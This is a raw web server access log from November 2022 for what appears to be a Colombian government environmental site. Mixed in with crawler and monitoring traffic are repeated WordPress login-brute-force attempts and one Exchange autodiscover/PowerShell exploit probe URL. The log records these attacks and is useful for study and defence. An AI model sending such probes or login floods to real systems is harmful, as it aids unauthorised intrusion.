77.88.5.167 - - [06/Nov/2022:03:02:19 -0500] "-" 408 -
172.22.2.4 - - [06/Nov/2022:03:01:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [06/Nov/2022:03:02:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [06/Nov/2022:03:04:59 -0500] "HEAD / HTTP/1.1" 200 -
40.122.227.201 - - [06/Nov/2022:03:05:41 -0500] "GET /portaldeninos/wp-content/uploads/2019/09/Categorias-%C3%A1rboles.jpg HTTP/1.1" 200 275407
172.22.2.4 - - [06/Nov/2022:03:06:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Nov/2022:03:07:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:03:06:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
66.249.73.127 - - [06/Nov/2022:03:08:56 -0500] "-" 408 -
216.245.221.92 - - [06/Nov/2022:03:09:59 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.100 - - [06/Nov/2022:03:11:41 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [06/Nov/2022:03:11:42 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
77.88.5.29 - - [06/Nov/2022:03:12:19 -0500] "-" 408 -
172.22.2.4 - - [06/Nov/2022:03:12:32 -0500] "GET /BLA/boletinlegal/explore HTTP/1.1" 404 1018
201.245.192.253 - - [06/Nov/2022:03:12:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
185.119.81.101 - - [06/Nov/2022:03:13:14 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.101 - - [06/Nov/2022:03:13:15 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
172.22.2.4 - - [06/Nov/2022:03:11:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:03:12:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [06/Nov/2022:03:14:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Nov/2022:03:17:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:03:17:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Nov/2022:03:19:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:03:18:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [06/Nov/2022:03:21:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42921
201.245.192.253 - - [06/Nov/2022:03:21:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44149
207.46.13.11 - - [06/Nov/2022:03:21:22 -0500] "GET /Publicaciones/2022EE240927.pdf HTTP/1.1" 404 228
93.158.161.37 - - [06/Nov/2022:03:22:19 -0500] "-" 408 -
201.245.192.253 - - [06/Nov/2022:03:22:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [06/Nov/2022:03:24:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:03:23:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:03:24:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [06/Nov/2022:03:27:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
186.102.0.200 - - [06/Nov/2022:03:28:07 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19V7I/nEbK18fShafR8T6nsI63tq8texjM36GObFhQ00btJZxlknqdMrsSBqU8UtJ3fvZ+PgJwcS19to/JdHlMRPO4opTOoIHd0JyBI8+fksTWlgGifi2x0lrCvV5uIc3olGjrtkUBwO9sUGWW79SnsbOt6LNrM/ayIhBKtUDj5CVz3hw0ukRgPXWaTWwAyyVIbyksIyIJuw2P3dvKt/2E9HGptqvWhOR25gulmoFD87FlhgVhXvq6lR4+cGQSesQ1I/NQtfKLVwA==&u=U2FsdGVkX1/n4seDGVQg+VBjApmadXe/vUKN8B+9RuiyBsS4xvytt0nH+PGFLsU3&y=U2FsdGVkX184s+YBouNt55c3TNXMbQhk7d35oxxsg/nfQVjihYPq3PdrbSBj3vpo HTTP/1.1" 200 26
186.102.0.200 - - [06/Nov/2022:03:28:07 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX1/n4seDGVQg+VBjApmadXe/vUKN8B+9RuiyBsS4xvytt0nH+PGFLsU3&y=U2FsdGVkX184s+YBouNt55c3TNXMbQhk7d35oxxsg/nfQVjihYPq3PdrbSBj3vpo HTTP/1.1" 200 26
186.102.0.200 - - [06/Nov/2022:03:28:08 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1++OtCbSaFPTrJl9eKVl7p1h2wPHROHHu6/X4+W64ItUucFEvVWMOvKapiL+IvEJx3TfMW5aVfqYbhlbO0kv+HlHmk58HPEVAnVne+sHpOn5py5AylFSRRcnH5TANxSUlR3HKwRHfo9/2UEoFMSKRAgjYpoImKQ4V8=&u=U2FsdGVkX1/n4seDGVQg+VBjApmadXe/vUKN8B+9RuiyBsS4xvytt0nH+PGFLsU3&y=U2FsdGVkX184s+YBouNt55c3TNXMbQhk7d35oxxsg/nfQVjihYPq3PdrbSBj3vpo HTTP/1.1" 200 26
186.102.0.200 - - [06/Nov/2022:03:28:09 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+RZeFNl/CDs5HRvCdPgmCKyJt+EJljfTj7nIou4KXO+0KwkM96wV0dr2XkuuQbYKsFzXfyWYyCapkObK4/a3d9fFpLtbwy2DLqauthUL0LEplUrwsJovrTL/x26RfQkEdrgjpEhhIkq0ByjXA59X0hhAlZ1b9q5Lc=&u=U2FsdGVkX1/n4seDGVQg+VBjApmadXe/vUKN8B+9RuiyBsS4xvytt0nH+PGFLsU3&y=U2FsdGVkX184s+YBouNt55c3TNXMbQhk7d35oxxsg/nfQVjihYPq3PdrbSBj3vpo HTTP/1.1" 200 26
186.102.0.200 - - [06/Nov/2022:03:28:09 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+70oHYceBVvEFs66SuVuVHX/UFuvtlom5kUdS8Vw4r0slImCic1u8Gb0xBuiCfU7FTcJMEfFlA6geI8wqyUTG9tV+sLR0q2R1413Q/JPwmgX75nOXNdhKcMBjxdndjW+CkVzj1ftmmPfWpgNgA+EFECscFsd0lPG4=&u=U2FsdGVkX1/n4seDGVQg+VBjApmadXe/vUKN8B+9RuiyBsS4xvytt0nH+PGFLsU3&y=U2FsdGVkX184s+YBouNt55c3TNXMbQhk7d35oxxsg/nfQVjihYPq3PdrbSBj3vpo HTTP/1.1" 200 26
186.102.0.200 - - [06/Nov/2022:03:28:09 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+WD8jpkrEb4TmJZjGzNr3louDWCXqIJ6zCyMONB+zoytn4t/ojj6u1wQ0tjpLptjOMq8tJCQCoXUI5IPgAHUscLkFtpbFlwlccDWN1Eln6gMzt8ZXMtgX5aQkzvj9YtZdbZB1oPcZTQxyAjm5eAOjsD/ZatdiGb2lkHh1sEKIjhjXrwGoZdHTWwoAreqW8RYKQJbAJNftXuQ==&u=U2FsdGVkX1/n4seDGVQg+VBjApmadXe/vUKN8B+9RuiyBsS4xvytt0nH+PGFLsU3&y=U2FsdGVkX184s+YBouNt55c3TNXMbQhk7d35oxxsg/nfQVjihYPq3PdrbSBj3vpo HTTP/1.1" 200 26
216.245.221.92 - - [06/Nov/2022:03:29:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:03:29:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
83.24.205.36 - - [06/Nov/2022:03:31:11 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [06/Nov/2022:03:31:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42921
201.245.192.253 - - [06/Nov/2022:03:31:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44149
185.119.81.103 - - [06/Nov/2022:03:31:15 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [06/Nov/2022:03:31:17 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [06/Nov/2022:03:30:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
185.119.81.100 - - [06/Nov/2022:03:32:04 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [06/Nov/2022:03:32:05 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [06/Nov/2022:03:32:06 -0500] "GET /BLA/boletinlegal/autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 1018
93.158.161.41 - - [06/Nov/2022:03:32:19 -0500] "-" 408 -
201.245.192.253 - - [06/Nov/2022:03:32:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [06/Nov/2022:03:34:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:03:35:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Nov/2022:03:37:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:03:36:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
66.249.73.127 - - [06/Nov/2022:03:38:20 -0500] "-" 408 -
216.245.221.92 - - [06/Nov/2022:03:39:58 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Nov/2022:03:41:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42921
201.245.192.253 - - [06/Nov/2022:03:41:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44149
40.77.167.46 - - [06/Nov/2022:03:41:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/2001%20250-299.TIF HTTP/1.1" 200 9212960
77.88.5.171 - - [06/Nov/2022:03:42:19 -0500] "-" 408 -
201.245.192.253 - - [06/Nov/2022:03:42:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:03:41:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:03:41:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59319
216.245.221.92 - - [06/Nov/2022:03:44:58 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.41 - - [06/Nov/2022:03:45:38 -0500] "GET /portaldeninos/2021/04/16/secretaria-de-ambiente-apoya-el-reto-planeta-2021-e-invita-a-instituciones-educativas-a-unirse/feed/ HTTP/1.1" 200 1234
157.55.39.190 - - [06/Nov/2022:03:46:35 -0500] "GET /BLA/resoluciones/00000007.tif HTTP/1.1" 404 1018
201.245.192.253 - - [06/Nov/2022:03:47:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:03:46:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:03:47:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59319
216.245.221.92 - - [06/Nov/2022:03:49:58 -0500] "HEAD / HTTP/1.1" 200 -
186.102.0.200 - - [06/Nov/2022:03:52:08 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX182y4H8YPeIrVYkz0+i18noo7l4Y814b+J8pYRs6xEhi0JgF9u/ryOFqaZQPstwfo+H3tVfE4l/bxBvVXviLL8rV2rXRkaSB+VDaKGefFh+dE6a2IrbHf9lrO3stGurvH9NeMYB4Sw5BpBDSQylAgCKQo8/RdknJ+VwCL4KfKn6+6EJjH+lKbxai2NlC1UESZhyikkVg7MhtQR1/s0spWn3sOuFI+6ZCZ/uRm/OnaKdvxe+84JN/UGEkZv/JdmMgO26Uk6FbCTX9A==&u=U2FsdGVkX1/n4seDGVQg+VBjApmadXe/vUKN8B+9RuiyBsS4xvytt0nH+PGFLsU3&y=U2FsdGVkX184s+YBouNt55c3TNXMbQhk7d35oxxsg/nfQVjihYPq3PdrbSBj3vpo HTTP/1.1" 200 26
186.102.0.200 - - [06/Nov/2022:03:52:08 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX1/n4seDGVQg+VBjApmadXe/vUKN8B+9RuiyBsS4xvytt0nH+PGFLsU3&y=U2FsdGVkX184s+YBouNt55c3TNXMbQhk7d35oxxsg/nfQVjihYPq3PdrbSBj3vpo HTTP/1.1" 200 26
186.102.0.200 - - [06/Nov/2022:03:52:09 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX193j9Zfmbe93uhXC+e6+acVOw3JwIsNZtOHZbUfELGdp8AmjVnl3RTMslRuk85LYjlEoBWwZqTNVXiipo+j/lMf8dw8uIT4xQZlGZUjZsa/6dqVvYyPqjEUry09H5PN41v4NroKp4lGP8ayKZkpV4g3sDkC3+UNn70=&u=U2FsdGVkX1/n4seDGVQg+VBjApmadXe/vUKN8B+9RuiyBsS4xvytt0nH+PGFLsU3&y=U2FsdGVkX184s+YBouNt55c3TNXMbQhk7d35oxxsg/nfQVjihYPq3PdrbSBj3vpo HTTP/1.1" 200 26
186.102.0.200 - - [06/Nov/2022:03:52:09 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+kO8K8yqWXpHuU1Sk4UonXzI5fdnWe85LpuzwpH64E8ZvliDCAhh33eCZ/AgBNKPDflDxMjcljpJJ9Lly9NkOIgiGdlnhUuKBfuA5RH064+5nAaDInhL42DwgVPMZuQtqm560MhdbcIacs9uM6GboOqF7ZXaKT5xk=&u=U2FsdGVkX1/n4seDGVQg+VBjApmadXe/vUKN8B+9RuiyBsS4xvytt0nH+PGFLsU3&y=U2FsdGVkX184s+YBouNt55c3TNXMbQhk7d35oxxsg/nfQVjihYPq3PdrbSBj3vpo HTTP/1.1" 200 26
186.102.0.200 - - [06/Nov/2022:03:52:09 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+sHe57ojJuLXTo8N4ridRLKF54hZTjBQpsitdoynvIG7esc2mpFsED9rLMSm0JDtG4KWYS7p7ursrFZXw5d7FX05inB030kIjQoWYhis+w+hc605YtJod/hlh+TaP59/OBo9/cMngJe8E+LBoD3j8Y+BZrfEc2GfQ=&u=U2FsdGVkX1/n4seDGVQg+VBjApmadXe/vUKN8B+9RuiyBsS4xvytt0nH+PGFLsU3&y=U2FsdGVkX184s+YBouNt55c3TNXMbQhk7d35oxxsg/nfQVjihYPq3PdrbSBj3vpo HTTP/1.1" 200 26
186.102.0.200 - - [06/Nov/2022:03:52:09 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19ozyDxYH8t8D5IlJmyODK7c2vIy6PFpw9aUs4T2erFLFS/5qlWWXYY7aiE0ZInVSreBG90ALSVyN8RCxycKM4m2YReTD4uVjpjjbpONdvsrO/4QWywikpGrg14xN0dEP++cjpSoGLAiFU19SMaLkvFsBt9O4GZg8OMgjGM3PWQk2/1JD6Ie9QS2nignDDLBRnS6CMNWkRQ0g==&u=U2FsdGVkX1/n4seDGVQg+VBjApmadXe/vUKN8B+9RuiyBsS4xvytt0nH+PGFLsU3&y=U2FsdGVkX184s+YBouNt55c3TNXMbQhk7d35oxxsg/nfQVjihYPq3PdrbSBj3vpo HTTP/1.1" 200 26
77.88.5.173 - - [06/Nov/2022:03:52:19 -0500] "-" 408 -
201.245.192.253 - - [06/Nov/2022:03:52:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
66.249.73.127 - - [06/Nov/2022:03:53:13 -0500] "-" 408 -
185.119.81.100 - - [06/Nov/2022:03:53:33 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [06/Nov/2022:03:53:34 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [06/Nov/2022:03:52:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Nov/2022:03:54:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:03:53:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
69.171.249.112 - - [06/Nov/2022:03:56:33 -0500] "GET /incautadas-tarantulas-que-iban-a-ser-exportadas-ilegalmente-desde-bogota-hasta-mexico.html HTTP/1.1" 206 899
201.245.192.253 - - [06/Nov/2022:03:57:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
40.77.167.46 - - [06/Nov/2022:03:58:19 -0500] "GET /BLA/resoluciones/AUTOS%202022/3582.pdf HTTP/1.1" 200 665793
157.55.39.190 - - [06/Nov/2022:03:59:05 -0500] "GET /transparencia/General%20Asignado/? HTTP/1.1" 200 43125
66.249.73.127 - - [06/Nov/2022:03:59:58 -0500] "-" 408 -
216.245.221.92 - - [06/Nov/2022:03:59:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:03:58:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.57 - - [06/Nov/2022:04:00:17 -0500] "GET / HTTP/1.1" 200 319
128.14.134.134 - - [06/Nov/2022:04:00:59 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [06/Nov/2022:03:59:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
20.29.110.170 - - [06/Nov/2022:04:02:13 -0500] "GET /galeria/nivo-slider/demo/images/bannerbolsas.jpg HTTP/1.1" 200 283727
77.88.5.38 - - [06/Nov/2022:04:02:19 -0500] "-" 408 -
201.245.192.253 - - [06/Nov/2022:04:02:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
216.245.221.92 - - [06/Nov/2022:04:04:58 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Nov/2022:04:04:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [06/Nov/2022:04:06:07 -0500] "-" 408 -
172.22.2.4 - - [06/Nov/2022:04:05:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
20.29.110.168 - - [06/Nov/2022:04:07:05 -0500] "GET /galeria/galeria/fotos/Humedal-la-conejera3G.jpg HTTP/1.1" 200 373974
185.119.81.100 - - [06/Nov/2022:04:07:26 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [06/Nov/2022:04:07:27 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
201.245.192.253 - - [06/Nov/2022:04:07:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
20.106.27.209 - - [06/Nov/2022:04:08:01 -0500] "GET /galeria/nivo-slider/demo/images/bannerdisrito.jpg HTTP/1.1" 200 278984
216.245.221.92 - - [06/Nov/2022:04:09:58 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.41 - - [06/Nov/2022:04:10:31 -0500] "GET /portaldeninos/parque-ecologico-distrital-humedal-santa-maria-del-lago/ HTTP/1.1" 200 90199
172.22.2.4 - - [06/Nov/2022:04:10:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
77.88.5.209 - - [06/Nov/2022:04:12:28 -0500] "-" 408 -
201.245.192.253 - - [06/Nov/2022:04:12:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:04:11:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
216.245.221.92 - - [06/Nov/2022:04:14:58 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [06/Nov/2022:04:15:48 -0500] "-" 408 -
207.46.13.11 - - [06/Nov/2022:04:16:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/2001%20900-949.TIF HTTP/1.1" 200 8558138
201.245.192.253 - - [06/Nov/2022:04:17:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40655
172.22.2.4 - - [06/Nov/2022:04:15:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.46 - - [06/Nov/2022:04:17:54 -0500] "GET /BLA/resoluciones/AUTOS%202022/3346.pdf HTTP/1.1" 200 334016
172.22.2.4 - - [06/Nov/2022:04:16:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57375
216.245.221.92 - - [06/Nov/2022:04:19:58 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Nov/2022:04:21:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43085
201.245.192.253 - - [06/Nov/2022:04:21:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44000
